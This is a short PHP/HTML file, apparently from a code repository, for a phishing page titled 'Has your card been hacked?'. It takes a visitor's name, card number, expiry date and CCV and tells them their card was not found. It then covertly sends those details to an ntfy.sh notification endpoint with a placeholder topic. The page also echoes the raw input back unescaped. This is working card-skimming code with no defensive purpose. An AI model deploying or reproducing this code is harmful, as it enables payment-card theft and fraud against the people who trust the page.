55 lines
1.4 KiB
PHP
55 lines
1.4 KiB
PHP
|
<!DOCTYPE html>
|
||
|
<html lang="en">
|
||
|
<head>
|
||
|
<meta charset="UTF-8">
|
||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||
|
<title>Has your card been hacked?</title>
|
||
|
<style>
|
||
|
body {
|
||
|
font-family: Arial, sans-serif;
|
||
|
background-color: #f5f5f5;
|
||
|
margin: 0;
|
||
|
padding: 0;
|
||
|
display: flex;
|
||
|
flex-direction: column;
|
||
|
align-items: center;
|
||
|
}
|
||
|
header {
|
||
|
background-color: #4CAF50;
|
||
|
color: white;
|
||
|
padding: 1rem;
|
||
|
width: 100%;
|
||
|
text-align: center;
|
||
|
}
|
||
|
h1 {
|
||
|
font-size: 1.5rem;
|
||
|
margin-bottom: 1rem;
|
||
|
}
|
||
|
footer, address {
|
||
|
text-align: center;
|
||
|
margin: 1rem 0;
|
||
|
}
|
||
|
</style>
|
||
|
<body>
|
||
|
<?php
|
||
|
$name = $_POST["name"];
|
||
|
$ccv = $_POST["ccv"];
|
||
|
$exp = $_POST["exp"];
|
||
|
$ccnumber = $_POST["ccnumber"];
|
||
|
$content = "$name, $ccv, $exp, $ccnumber"; ?>
|
||
|
<p>You're lucky, we didn't find it. Your card details:</p>
|
||
|
<?php echo $_POST["name"]; ?>
|
||
|
<?php echo $_POST["exp"]; ?>
|
||
|
<?php echo $_POST["ccnumber"]; ?>
|
||
|
<?php echo $_POST["ccv"]; ?>
|
||
|
<?php file_get_contents('https://ntfy.sh/REPLACE_THIS', false, stream_context_create([
|
||
|
'http' => [
|
||
|
'method' => 'POST',
|
||
|
'header' => 'Content-Type: text/plain',
|
||
|
'content' => $content
|
||
|
]
|
||
|
])); ?>
|
||
|
</body>
|
||
|
<footer>
|
||
|
<p>©</p>
|
||
|
</html>
|